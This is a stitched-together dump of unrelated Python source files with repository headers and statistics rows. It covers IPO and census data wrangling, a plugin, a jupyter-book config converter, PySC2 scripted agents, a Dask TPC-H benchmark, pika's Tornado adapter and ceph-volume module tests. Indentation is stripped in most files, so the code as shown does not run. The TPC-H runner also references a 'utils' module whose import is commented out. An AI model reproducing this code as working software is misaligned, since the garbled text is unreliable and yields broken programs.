ipo_month_filed = IPO_Date_Filed.month
ipo_year_filed = IPO_Date_Filed.year
AllHomes_header_filed = 'All Homes ' + str(ipo_year_filed) + '-' + str(ipo_month_filed).zfill(2)
ipo_month = IPO_Lockup_Expiration_Date.month
ipo_year = IPO_Lockup_Expiration_Date.year
AllHomes_header_lockup = 'All Homes ' + str(ipo_year) + '-' + str(ipo_month).zfill(2)
AllHomes_header_filed_1_yr_ago = 'All Homes ' + str(int(ipo_year_filed) - 1) + '-' + str(ipo_month_filed).zfill(2)
AllHomes_header_filed_2_yr = 'All Homes ' + str(int(ipo_year_filed) + 2) + '-' + str(ipo_month_filed).zfill(2)
filtered_columns = filtered_columns + [AllHomes_header_filed, AllHomes_header_lockup,
AllHomes_header_filed_1_yr_ago,
AllHomes_header_filed_2_yr]
return filtered_columns
def update_ipo_list(year, start_month, end_month):
web_scrapers.add_new_ipo_data_to_csv('../data/processed/1997-04_2019_full_ipo_data.csv', year, start_month, end_month)
df_ipo_list = load_data(['../data/processed/1997-04_2019_full_ipo_data.csv', '../data/raw/ipo_ritter_data.csv'])
zipcodes, zip_list = create_zipcode_list(
['../data/raw/Santa_Clara_County_Zipcodes.csv', '../data/raw/San_Mateo_County_Zipcodes.csv',
'../data/raw/San_Francisco_County_Zipcodes.csv', '../data/raw/Alameda_County_Zipcodes.csv'])
df_ipo = wrangle_IPO_data(df_ipo_list[0], zip_list)
df_ipo_ritter = wrangle_ipo_headers(df_ipo_list[1])
df_ipo = join_data(df_ipo, df_ipo_ritter, 'Symbol', 'left')
df_ipo = drop_columns_and_nans(df_ipo, ['IPO Name', 'Offer date', 'CUSIP', 'PERM'], ['CIK'])
df_ipo.to_csv("../data/processed/df_ipo.csv", index=True)
def main():
df_real_estate = load_real_estate_data('../data/raw/Zip_Zhvi_AllHomes.csv', 'State', 'CA')
    # data processing to load all IPO data between 1997 and the present. This data has been scraped using code from src/web_scrapers.py
df_ipo_list = load_data(['../data/processed/df_ipo.csv', '../data/raw/ipo_ritter_data.csv'])
df_census_list = load_data(['../data/raw/zip_census_bureau_economic_characteristics_2017.csv', '../data/raw/zip_census_bureau_age_race_2017.csv'])
zipcodes, zip_list = create_zipcode_list(
['../data/raw/Santa_Clara_County_Zipcodes.csv', '../data/raw/San_Mateo_County_Zipcodes.csv',
'../data/raw/San_Francisco_County_Zipcodes.csv', '../data/raw/Alameda_County_Zipcodes.csv'])
df_real_estate = wrangle_real_estate_data(df_real_estate, zip_list,['City', 'State', 'Metro', 'CountyName', 'SizeRank'])
df_ipo = wrangle_IPO_data(df_ipo_list[0], zip_list)
census_econ_columns = ['Zipcode',
'Unemployment Rate',
'Mean Travel Time to Work Estimate (minutes)',
'Percent of Households with Income Greater than $200,000',
'Median Household Income Estimate (dollars)',
'Mean Household Income Estimate (dollars)',
'Per Capita Income Estimate (dollars)',
'Percent of Population with no Health Insurance Coverage',
'Percent of People whose Income in the Past 12 months has been Below Poverty Level',
'Percent of Households With Income Less Than $24,999']
census_dem_columns = ['Zipcode',
'Median Age',
'Percent of People under 18 years of age',
'Percent of People 65 years and over',
'Percent of Males',
'Percent of Females',
'Percent of People who are Hispanic',
'Percent of People who are White',
'Percent of People who are Black or African American',
'Percent of People who are Asian']
df_census_econ, df_census_dem = wrangle_census_data(df_census_list[0], df_census_list[1], zip_list,
census_econ_columns, census_dem_columns)
df_real_estate = wrangle_real_estate_headers(df_real_estate)
df_ipo_ritter = wrangle_ipo_headers(df_ipo_list[1])
df_ipo_ritter = df_ipo_ritter.drop(['Found'], axis=1)
df_census = join_data(df_census_econ, df_census_dem, 'Zipcode', 'inner')
df_zip = merge_data(df_census, df_real_estate, 'Zipcode')
df_zip = df_replace(df_zip, ['\+', '\,'])
print(df_zip['All Homes 2019-05'])
df_ipo = join_data(df_ipo, df_ipo_ritter, 'Symbol', 'left')
df_ipo = drop_columns_and_nans(df_ipo, ['IPO Name', 'Offer date', 'CUSIP', 'PERM'], ['CIK'])
df_ipo['Found'] = 2019.0 - df_ipo['Found']
normalization_list = ['Offer Amount', 'Number of Employees', 'Found', 'Median Age',
'Percent of People under 18 years of age',
'Percent of People 65 years and over',
'Percent of Males',
'Percent of Females',
'Percent of People who are Hispanic',
'Percent of People who are White',
'Percent of People who are Black or African American',
'Percent of People who are Asian',
'Unemployment Rate',
'Mean Travel Time to Work Estimate (minutes)',
'Percent of Households with Income Greater than $200,000',
'Median Household Income Estimate (dollars)',
'Mean Household Income Estimate (dollars)',
'Per Capita Income Estimate (dollars)',
'Percent of Population with no Health Insurance Coverage',
'Percent of People whose Income in the Past 12 months has been Below Poverty Level',
'Percent of Households With Income Less Than $24,999']
zipcodes = update_zipcodes_dict(zipcodes, zip_list)
df_ipo_all = create_IPO_an_Zipcode_dataframe(census_econ_columns, census_dem_columns, df_ipo, df_zip, zipcodes)
df_ipo_all.to_csv("../data/processed/df_ipo_all.csv", index=False)
if __name__ == "__main__":
print("we are wrangling data")
#update_ipo_list(2019, 6, 7)
    main()
# ==== File: src/python/director/builtin/plugins/measurement_tool/plugin.py | Repo: afdaniele/director | License: BSD-3-Clause ====
from director.devel.plugin import GenericPlugin
from director.fieldcontainer import FieldContainer
from .lib import measurementpanel
from PythonQt import QtCore
class Plugin(GenericPlugin):
ID = 'measurement_tool'
NAME = 'MeasurementTool'
DEPENDENCIES = ['MainWindow']
def __init__(self, app, view):
super(Plugin, self).__init__(app, view)
def init(self, fields):
measurementPanel = measurementpanel.MeasurementPanel(self.app, self.view)
measurementDock = self.app.addWidgetToDock(
measurementPanel.widget,
QtCore.Qt.RightDockWidgetArea,
visible=False
)
# ---
return FieldContainer(
measurementToolPanel=measurementPanel,
measurementToolDock=measurementDock
)
| 25.310345 | 77 | 0.741144 | 569 | 0.775204 | 0 | 0 | 0 | 0 | 0 | 0 | 52 | 0.070845 |
# ==== File: jupyter_book/yaml.py | Repo: akhmerov/jupyter-book | License: BSD-3-Clause ====
"""A small sphinx extension to let you configure a site with YAML metadata."""
from pathlib import Path
# Transform a "Jupyter Book" YAML configuration file into a Sphinx configuration file.
# This is so that we can choose more user-friendly words for things than Sphinx uses.
# e.g., 'logo' instead of 'html_logo'.
# Note that this should only be used for **top level** keys.
PATH_YAML_DEFAULT = Path(__file__).parent.joinpath("default_config.yml")
def yaml_to_sphinx(yaml):
"""Convert a Jupyter Book style config structure into a Sphinx config dict."""
sphinx_config = {
"exclude_patterns": [
"_build",
"Thumbs.db",
".DS_Store",
"**.ipynb_checkpoints",
],
}
# Start with an empty options block
theme_options = {}
# Launch button configuration
launch_buttons_config = yaml.get("launch_buttons", {})
repository_config = yaml.get("repository", {})
theme_options["launch_buttons"] = launch_buttons_config
theme_options["path_to_docs"] = repository_config.get("path_to_book", "")
theme_options["repository_url"] = repository_config.get("url", "")
theme_options["repository_branch"] = repository_config.get("branch", "")
# HTML
html = yaml.get("html")
if html:
sphinx_config["html_favicon"] = html.get("favicon", "")
sphinx_config["html_baseurl"] = html.get("baseurl", "")
theme_options["google_analytics_id"] = html.get("google_analytics_id", "")
# Deprecate navbar_footer_text after a release cycle
theme_options["navbar_footer_text"] = html.get("navbar_footer_text", "")
theme_options["extra_navbar"] = html.get("extra_navbar", "")
theme_options["extra_footer"] = html.get("extra_footer", "")
theme_options["home_page_in_toc"] = html.get("home_page_in_navbar")
# Comments config
sphinx_config["comments_config"] = html.get("comments", {})
# Pass through the buttons
btns = ["use_repository_button", "use_edit_page_button", "use_issues_button"]
use_buttons = {btn: html.get(btn) for btn in btns if html.get(btn) is not None}
if any(use_buttons.values()):
if not repository_config.get("url"):
raise ValueError(
"To use 'repository' buttons, you must specify the repository URL"
)
# Update our config
theme_options.update(use_buttons)
# Update the theme options in the main config
sphinx_config["html_theme_options"] = theme_options
execute = yaml.get("execute")
if execute:
if execute.get("execute_notebooks") is False:
# Special case because YAML treats `off` as "False".
execute["execute_notebooks"] = "off"
sphinx_config["jupyter_execute_notebooks"] = execute.get(
"execute_notebooks", "auto"
)
sphinx_config["execution_timeout"] = execute.get("timeout", 30)
sphinx_config["jupyter_cache"] = execute.get("cache", "")
_recursive_update(
sphinx_config,
{"execution_excludepatterns": execute.get("exclude_patterns", [])},
)
# LaTeX
latex = yaml.get("latex")
if latex:
sphinx_config["latex_engine"] = latex.get("latex_engine", "pdflatex")
# Extra extensions
extra_extensions = yaml.get("sphinx", {}).get("extra_extensions")
if extra_extensions:
if not isinstance(extra_extensions, list):
extra_extensions = [extra_extensions]
extensions = sphinx_config.get("extensions", [])
for extra in extra_extensions:
extensions.append(extra)
sphinx_config["extensions"] = extensions
# Files that we wish to skip
sphinx_config["exclude_patterns"].extend(yaml.get("exclude_patterns", []))
# Now do simple top-level translations
YAML_TRANSLATIONS = {
"logo": "html_logo",
"title": "html_title",
"execute_notebooks": "jupyter_execute_notebooks",
"project": "project",
"author": "author",
"copyright": "copyright",
}
for key, newkey in YAML_TRANSLATIONS.items():
if key in yaml:
val = yaml.get(key)
if val is None:
val = ""
sphinx_config[newkey] = val
return sphinx_config
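# Illustrative sketch (not part of the original module): a minimal Jupyter Book
# config and the kind of Sphinx dict yaml_to_sphinx produces for it. The input
# values below are assumptions chosen only to show the key translations.
#
#   yaml_to_sphinx({"title": "My Book", "logo": "logo.png",
#                   "execute": {"execute_notebooks": "off"}})
#   # -> {"html_title": "My Book", "html_logo": "logo.png",
#   #     "jupyter_execute_notebooks": "off", "execution_timeout": 30,
#   #     "exclude_patterns": [...], "html_theme_options": {...}, ...}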
def _recursive_update(config, update):
"""Update the dict `config` with `update` recursively.
This *updates* nested dicts / lists instead of replacing them.
"""
for key, val in update.items():
if isinstance(config.get(key), dict):
config[key].update(val)
elif isinstance(config.get(key), list):
if isinstance(val, list):
config[key].extend(val)
else:
config[key] = val
else:
config[key] = val
| 37.083969 | 87 | 0.628036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,037 | 0.419308 |
9efb34b3c08bdbb3ec7a611587c6c1763f510bd0 | 5,759 | py | Python | ScriptedAgent.py | RaphaelRoyerRivard/Supervised-End-to-end-Weight-sharing-for-StarCraft-II | 17171fc95c8385920ab7cab80bd4681ce1bff799 | [
"Apache-2.0"
]
| null | null | null | ScriptedAgent.py | RaphaelRoyerRivard/Supervised-End-to-end-Weight-sharing-for-StarCraft-II | 17171fc95c8385920ab7cab80bd4681ce1bff799 | [
"Apache-2.0"
]
| null | null | null | ScriptedAgent.py | RaphaelRoyerRivard/Supervised-End-to-end-Weight-sharing-for-StarCraft-II | 17171fc95c8385920ab7cab80bd4681ce1bff799 | [
"Apache-2.0"
]
| null | null | null | __author__ = 'Tony Beltramelli - www.tonybeltramelli.com'
# scripted agents taken from PySC2, credits to DeepMind
# https://github.com/deepmind/pysc2/blob/master/pysc2/agents/scripted_agent.py
import numpy as np
import uuid
from pysc2.agents import base_agent
from pysc2.lib import actions
from pysc2.lib import features
_SCREEN_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_SCREEN_SELECTED = features.SCREEN_FEATURES.selected.index
_PLAYER_FRIENDLY = 1
_PLAYER_NEUTRAL = 3
_PLAYER_HOSTILE = 4
_NO_OP = actions.FUNCTIONS.no_op.id
_MOVE_SCREEN = actions.FUNCTIONS.Move_screen.id
_ATTACK_SCREEN = actions.FUNCTIONS.Attack_screen.id
_SELECT_ARMY = actions.FUNCTIONS.select_army.id
_NOT_QUEUED = [0]
_SELECT_ALL = [0]
class ScriptedAgent(base_agent.BaseAgent):
def step(self, obs):
super(ScriptedAgent, self).step(obs)
# we expand dims because keras wants 4 dims for convolutions
# observation = np.expand_dims(obs.observation["screen"][_SCREEN_PLAYER_RELATIVE], axis=3)
screens = [obs.observation["screen"][_SCREEN_PLAYER_RELATIVE],
obs.observation["screen"][_SCREEN_SELECTED]]
observation = np.stack(screens, axis=2)
if self.game == "beacon":
if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]:
player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE]
neutral_y, neutral_x = (player_relative == 3).nonzero()
if not neutral_y.any():
action = _NO_OP
params = []
else:
target = [int(neutral_x.mean()), int(neutral_y.mean())]
action = _MOVE_SCREEN
params = [[0], target]
else:
action = _SELECT_ARMY
params = [[0]]
elif self.game == "mineral":
if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]:
player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE]
neutral_y, neutral_x = (player_relative == 3).nonzero()
player_y, player_x = (player_relative == 1).nonzero()
if not neutral_y.any() or not player_y.any():
action = _NO_OP
params = []
else:
action = _MOVE_SCREEN
index_x = np.argmin(neutral_x)
index_y = np.argmin(neutral_y)
index = index_x if neutral_x[index_x] + neutral_y[index_x] < neutral_x[index_y] + neutral_y[index_y] else index_y
target = [neutral_x[index], neutral_y[index]]
params = [[0], target]
else:
action = _SELECT_ARMY
params = [[0]]
elif self.game == "minerals":
if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]:
player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE]
neutral_y, neutral_x = (player_relative == 3).nonzero()
player_y, player_x = (player_relative == 1).nonzero()
if not neutral_y.any() or not player_y.any():
action = _NO_OP
params = []
else:
player = [int(player_x.mean()), int(player_y.mean())]
closest, min_dist = None, None
for p in zip(neutral_x, neutral_y):
dist = np.linalg.norm(np.array(player) - np.array(p))
if not min_dist or dist < min_dist:
closest, min_dist = p, dist
action = _MOVE_SCREEN
params = [[0], closest]
else:
action = _SELECT_ARMY
params = [[0]]
elif self.game == "roaches":
if _ATTACK_SCREEN in obs.observation["available_actions"]:
player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE]
roach_y, roach_x = (player_relative == _PLAYER_HOSTILE).nonzero()
if not roach_y.any():
action = _NO_OP
params = [_NOT_QUEUED]
else:
index = np.argmax(roach_y)
target = [roach_x[index], roach_y[index]]
action = _ATTACK_SCREEN
params = [_NOT_QUEUED, target]
elif _SELECT_ARMY in obs.observation["available_actions"]:
action = _SELECT_ARMY
params = [_SELECT_ALL]
else:
action = _NO_OP
params = [_NOT_QUEUED]
self.states.append(np.array([observation, obs.observation["available_actions"], action, params]))
if len(self.states) == 64:
new_file_name = str(uuid.uuid1())
np.save("dataset_{}/{}".format(self.game, new_file_name), np.array(self.states))
self.states = []
return actions.FunctionCall(action, params)
class AgentRoaches(ScriptedAgent):
def __init__(self):
base_agent.BaseAgent.__init__(self)
self.game = "roaches"
self.states = []
class AgentBeacon(ScriptedAgent):
def __init__(self):
base_agent.BaseAgent.__init__(self)
self.game = "beacon"
self.states = []
class AgentMineral(ScriptedAgent):
def __init__(self):
base_agent.BaseAgent.__init__(self)
self.game = "mineral"
self.states = []
class AgentMinerals(ScriptedAgent):
def __init__(self):
base_agent.BaseAgent.__init__(self)
self.game = "minerals"
self.states = []
| 39.445205 | 133 | 0.576489 | 5,007 | 0.869422 | 0 | 0 | 0 | 0 | 0 | 0 | 576 | 0.100017 |
9efb77347037fbe157767ce33cce2fb416895aa6 | 5,602 | py | Python | benchmark/test_tpch.py | serverless-analytics/dask-distributed-vanilla | b4b135ee956dbf9e64d10712558a88eafa080675 | [
"BSD-3-Clause"
]
| null | null | null | benchmark/test_tpch.py | serverless-analytics/dask-distributed-vanilla | b4b135ee956dbf9e64d10712558a88eafa080675 | [
"BSD-3-Clause"
]
| null | null | null | benchmark/test_tpch.py | serverless-analytics/dask-distributed-vanilla | b4b135ee956dbf9e64d10712558a88eafa080675 | [
"BSD-3-Clause"
]
| null | null | null | import time
import sys
import dask
from dask.distributed import (
wait,
futures_of,
Client,
)
from tpch import loaddata, queries
#from benchmarks import utils
# Paths or URLs to the TPC-H tables.
#table_paths = {
# 'CUSTOMER': 'hdfs://bu-23-115:9000/tpch/customer.tbl',
# 'LINEITEM': 'hdfs://bu-23-115:9000/tpch/lineitem.tbl',
# 'NATION': 'hdfs://bu-23-115:9000/tpch/nation.tbl',
# 'ORDERS': 'hdfs://bu-23-115:9000/tpch/orders.tbl',
# 'PART': 'hdfs://bu-23-115:9000/tpch/part.tbl',
# 'PARTSUPP': 'hdfs://bu-23-115:9000/tpch/partsupp.tbl',
# 'REGION': 'hdfs://bu-23-115:9000/tpch/region.tbl',
# 'SUPPLIER': 'hdfs://bu-23-115:9000/tpch/supplier.tbl',
#}
table_paths = {
'CUSTOMER': '/root/2g/customer.tbl',
'LINEITEM': '/root/2g/lineitem.tbl',
'NATION': '/root/2g/nation.tbl',
'ORDERS': '/root/2g/orders.tbl',
'PART': '/root/2g/part.tbl',
'PARTSUPP': '/root/2g/partsupp.tbl',
'REGION': '/root/2g/region.tbl',
'SUPPLIER': '/root/2g/supplier.tbl',
}
#table_paths = {
# 'CUSTOMER': 'https://gochaudhstorage001.blob.core.windows.net/tpch/customer.tbl',
# 'LINEITEM': 'https://gochaudhstorage001.blob.core.windows.net/tpch/lineitem.tbl',
# 'NATION': 'https://gochaudhstorage001.blob.core.windows.net/tpch/nation.tbl',
# 'ORDERS': 'https://gochaudhstorage001.blob.core.windows.net/tpch/orders.tbl',
# 'PART': 'https://gochaudhstorage001.blob.core.windows.net/tpch/part.tbl',
# 'PARTSUPP': 'https://gochaudhstorage001.blob.core.windows.net/tpch/partsupp.tbl',
# 'REGION': 'https://gochaudhstorage001.blob.core.windows.net/tpch/region.tbl',
# 'SUPPLIER': 'https://gochaudhstorage001.blob.core.windows.net/tpch/supplier.tbl',
#}
def main():
if len(sys.argv) < 2:
print("args: <dask client>")
return 1
client = Client(sys.argv[1])
timing_supported = False
# set to False if running against upstream dask without our code changes.
benchmarker = TpchBenchmarkManager(client, timing_supported)
benchmarker.load_tables(
part_path = table_paths['PART'],
supplier_path = table_paths['SUPPLIER'],
partsupp_path = table_paths['PARTSUPP'],
customer_path = table_paths['CUSTOMER'],
orders_path = table_paths['ORDERS'],
lineitem_path = table_paths['LINEITEM'],
nation_path = table_paths['NATION'],
region_path = table_paths['REGION'],
)
# Choose what queries you want to run here.
benchmarker.run_query(1)
#benchmarker.run_query(3)
#benchmarker.run_query(6)
#benchmarker.run_query(21)
class TpchBenchmarkManager:
def __init__(self, client, timing_supported=True):
self.client = client
self.timing_supported = timing_supported
self.tables = {}
def load_tables(self,
*,
# Paths/URLs for TPCH tables source data.
part_path=None,
supplier_path=None,
partsupp_path=None,
customer_path=None,
orders_path=None,
lineitem_path=None,
nation_path=None,
region_path=None,
):
paths = {
'PART': part_path,
'SUPPLIER': supplier_path,
'PARTSUPP': partsupp_path,
'CUSTOMER': customer_path,
'ORDERS': orders_path,
'LINEITEM': lineitem_path,
'NATION': nation_path,
'REGION': region_path,
}
for tablename, path in paths.items():
if path is None:
print("\nNo path given for table {}. Skipping.".format(tablename))
continue
print("\n====================================")
print("Ingesting table {}... \n(from {})".format(tablename, path))
load_start = time.time()
table = loaddata.loader[tablename](path)
#table = self.client.persist(table)
#wait(table)
load_duration = time.time() - load_start
self.tables[tablename] = table
futures = futures_of(table)
print("...complete.")
print("\nE2E time: {:.3f} seconds. Number of partitions: {}".format(
load_duration, len(futures)))
print("====================================\n")
if self.timing_supported:
longest_future = None
longest_future_duration = None
for future in futures:
duration = self.client.timing_info(future)[0]['duration']
if longest_future is None or duration > longest_future_duration:
longest_future = future
longest_future_duration = duration
print("Profile of slowest partition:")
#utils.prettyprint_timing_info(self.client.timing_info(longest_future))
def run_query(self, query_num):
print("\n====================================")
print("Executing query {}...".format(query_num))
query_start = time.time()
futures = queries.by_number[query_num](self.tables)
future = self.client.compute(futures)
result = self.client.gather(future)
query_duration = time.time() - query_start
print("...complete.")
print("\nE2E time: {:.3f} seconds.".format(query_duration))
if self.timing_supported:
try:
utils.prettyprint_timing_info(self.client.timing_info(future))
except Exception as e:
print(str(e))
print(result)
return future
if __name__ == '__main__':
main()
| 35.0125 | 87 | 0.593181 | 2,959 | 0.528204 | 0 | 0 | 0 | 0 | 0 | 0 | 2,362 | 0.421635 |
9efc2be79705e76de2137bab964886217cb24983 | 3,582 | py | Python | pika/adapters/tornado_connection.py | hugovk/pika | 03542ef616a2a849e8bfb0845427f50e741ea0c6 | [
"BSD-3-Clause"
]
| 1 | 2019-08-28T10:10:56.000Z | 2019-08-28T10:10:56.000Z | pika/adapters/tornado_connection.py | goupper/pika | e2f26db4f41ac7ea6bdc50964a766472460dce4a | [
"BSD-3-Clause"
]
| null | null | null | pika/adapters/tornado_connection.py | goupper/pika | e2f26db4f41ac7ea6bdc50964a766472460dce4a | [
"BSD-3-Clause"
]
| null | null | null | """Use pika with the Tornado IOLoop
"""
import logging
from tornado import ioloop
from pika.adapters.utils import nbio_interface, selector_ioloop_adapter
from pika.adapters import base_connection
LOGGER = logging.getLogger(__name__)
class TornadoConnection(base_connection.BaseConnection):
"""The TornadoConnection runs on the Tornado IOLoop.
"""
def __init__(self,
parameters=None,
on_open_callback=None,
on_open_error_callback=None,
on_close_callback=None,
custom_ioloop=None,
internal_connection_workflow=True):
"""Create a new instance of the TornadoConnection class, connecting
to RabbitMQ automatically
:param pika.connection.Parameters parameters: Connection parameters
:param on_open_callback: The method to call when the connection is open
:type on_open_callback: method
:param None | method on_open_error_callback: Called if the connection
can't be established or connection establishment is interrupted by
`Connection.close()`: on_open_error_callback(Connection, exception).
:param None | method on_close_callback: Called when a previously fully
open connection is closed:
`on_close_callback(Connection, exception)`, where `exception` is
either an instance of `exceptions.ConnectionClosed` if closed by
user or broker or exception of another type that describes the cause
of connection failure.
:param None | ioloop.IOLoop |
nbio_interface.AbstractIOServices custom_ioloop:
Override using the global IOLoop in Tornado
:param bool internal_connection_workflow: True for autonomous connection
establishment which is default; False for externally-managed
connection workflow via the `create_connection()` factory.
"""
if isinstance(custom_ioloop, nbio_interface.AbstractIOServices):
nbio = custom_ioloop
else:
nbio = (
selector_ioloop_adapter.SelectorIOServicesAdapter(
custom_ioloop or ioloop.IOLoop.instance()))
super(TornadoConnection, self).__init__(
parameters,
on_open_callback,
on_open_error_callback,
on_close_callback,
nbio,
internal_connection_workflow=internal_connection_workflow)
@classmethod
def create_connection(cls,
connection_configs,
on_done,
custom_ioloop=None,
workflow=None):
"""Implement
:py:classmethod:`pika.adapters.BaseConnection.create_connection()`.
"""
nbio = selector_ioloop_adapter.SelectorIOServicesAdapter(
custom_ioloop or ioloop.IOLoop.instance())
def connection_factory(params):
"""Connection factory."""
if params is None:
raise ValueError('Expected pika.connection.Parameters '
'instance, but got None in params arg.')
return cls(
parameters=params,
custom_ioloop=nbio,
internal_connection_workflow=False)
return cls._start_connection_workflow(
connection_configs=connection_configs,
connection_factory=connection_factory,
nbio=nbio,
workflow=workflow,
on_done=on_done)
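# Illustrative usage sketch (not part of the original file); the host value and
# callback are assumptions:
#
#   import pika
#   connection = TornadoConnection(
#       pika.ConnectionParameters(host='localhost'),
#       on_open_callback=lambda conn: print('connection opened'))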
| 38.934783 | 80 | 0.634283 | 3,341 | 0.932719 | 0 | 0 | 1,079 | 0.301228 | 0 | 0 | 1,623 | 0.453099 |
9efe36b7df749158058e0d954855a509a9ce6a8b | 7,057 | py | Python | tests/library/test_ceph_volume_simple_activate.py | u-kosmonaft-u/ceph-ansible | 14c472707c165f77def05826b22885480af3e8f9 | [
"Apache-2.0"
]
| 1,570 | 2015-01-03T08:38:22.000Z | 2022-03-31T09:24:37.000Z | tests/library/test_ceph_volume_simple_activate.py | u-kosmonaft-u/ceph-ansible | 14c472707c165f77def05826b22885480af3e8f9 | [
"Apache-2.0"
]
| 4,964 | 2015-01-05T10:41:44.000Z | 2022-03-31T07:59:49.000Z | tests/library/test_ceph_volume_simple_activate.py | u-kosmonaft-u/ceph-ansible | 14c472707c165f77def05826b22885480af3e8f9 | [
"Apache-2.0"
]
| 1,231 | 2015-01-04T11:48:16.000Z | 2022-03-31T12:15:28.000Z | from mock.mock import patch
import os
import pytest
import ca_test_common
import ceph_volume_simple_activate
fake_cluster = 'ceph'
fake_container_binary = 'podman'
fake_container_image = 'quay.ceph.io/ceph/daemon:latest'
fake_id = '42'
fake_uuid = '0c4a7eca-0c2a-4c12-beff-08a80f064c52'
fake_path = '/etc/ceph/osd/{}-{}.json'.format(fake_id, fake_uuid)
class TestCephVolumeSimpleActivateModule(object):
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
def test_with_check_mode(self, m_exit_json):
ca_test_common.set_module_args({
'osd_id': fake_id,
'osd_fsid': fake_uuid,
'_ansible_check_mode': True
})
m_exit_json.side_effect = ca_test_common.exit_json
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert not result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid]
assert result['rc'] == 0
assert not result['stdout']
assert not result['stderr']
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_with_failure(self, m_run_command, m_exit_json):
ca_test_common.set_module_args({
'osd_id': fake_id,
'osd_fsid': fake_uuid
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = 'error'
rc = 2
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid]
assert result['rc'] == rc
assert result['stderr'] == stderr
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_activate_all_osds(self, m_run_command, m_exit_json):
ca_test_common.set_module_args({
'osd_all': True
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = ''
rc = 0
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', '--all']
assert result['rc'] == rc
assert result['stderr'] == stderr
assert result['stdout'] == stdout
@patch.object(os.path, 'exists', return_value=True)
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_activate_path_exists(self, m_run_command, m_exit_json, m_os_path):
ca_test_common.set_module_args({
'path': fake_path
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = ''
rc = 0
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', '--file', fake_path]
assert result['rc'] == rc
assert result['stderr'] == stderr
assert result['stdout'] == stdout
@patch.object(os.path, 'exists', return_value=False)
@patch('ansible.module_utils.basic.AnsibleModule.fail_json')
def test_activate_path_not_exists(self, m_fail_json, m_os_path):
ca_test_common.set_module_args({
'path': fake_path
})
m_fail_json.side_effect = ca_test_common.fail_json
with pytest.raises(ca_test_common.AnsibleFailJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['msg'] == '{} does not exist'.format(fake_path)
assert result['rc'] == 1
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_activate_without_systemd(self, m_run_command, m_exit_json):
ca_test_common.set_module_args({
'osd_id': fake_id,
'osd_fsid': fake_uuid,
'systemd': False
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = ''
rc = 0
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid, '--no-systemd']
assert result['rc'] == rc
assert result['stderr'] == stderr
assert result['stdout'] == stdout
@patch.dict(os.environ, {'CEPH_CONTAINER_BINARY': fake_container_binary})
@patch.dict(os.environ, {'CEPH_CONTAINER_IMAGE': fake_container_image})
@patch('ansible.module_utils.basic.AnsibleModule.exit_json')
@patch('ansible.module_utils.basic.AnsibleModule.run_command')
def test_activate_with_container(self, m_run_command, m_exit_json):
ca_test_common.set_module_args({
'osd_id': fake_id,
'osd_fsid': fake_uuid,
})
m_exit_json.side_effect = ca_test_common.exit_json
stdout = ''
stderr = ''
rc = 0
m_run_command.return_value = rc, stdout, stderr
with pytest.raises(ca_test_common.AnsibleExitJson) as result:
ceph_volume_simple_activate.main()
result = result.value.args[0]
assert result['changed']
assert result['cmd'] == [fake_container_binary,
'run', '--rm', '--privileged',
'--ipc=host', '--net=host',
'-v', '/etc/ceph:/etc/ceph:z',
'-v', '/var/lib/ceph/:/var/lib/ceph/:z',
'-v', '/var/log/ceph/:/var/log/ceph/:z',
'-v', '/run/lvm/:/run/lvm/',
'-v', '/run/lock/lvm/:/run/lock/lvm/',
'--entrypoint=ceph-volume', fake_container_image,
'--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid]
assert result['rc'] == rc
assert result['stderr'] == stderr
assert result['stdout'] == stdout
| 40.325714 | 132 | 0.621794 | 6,700 | 0.949412 | 0 | 0 | 6,609 | 0.936517 | 0 | 0 | 1,686 | 0.238912 |
9effc7a4839375e16dbdf0896beb3c70b1e21234 | 154 | py | Python | setup.py | Minterious/minter-monitoring | 1a2216be57dec491a970950c3b9cfc72cea228c2 | [
"MIT"
]
| 2 | 2019-08-24T12:15:20.000Z | 2019-08-24T12:19:07.000Z | setup.py | Minterious/minter-monitoring | 1a2216be57dec491a970950c3b9cfc72cea228c2 | [
"MIT"
]
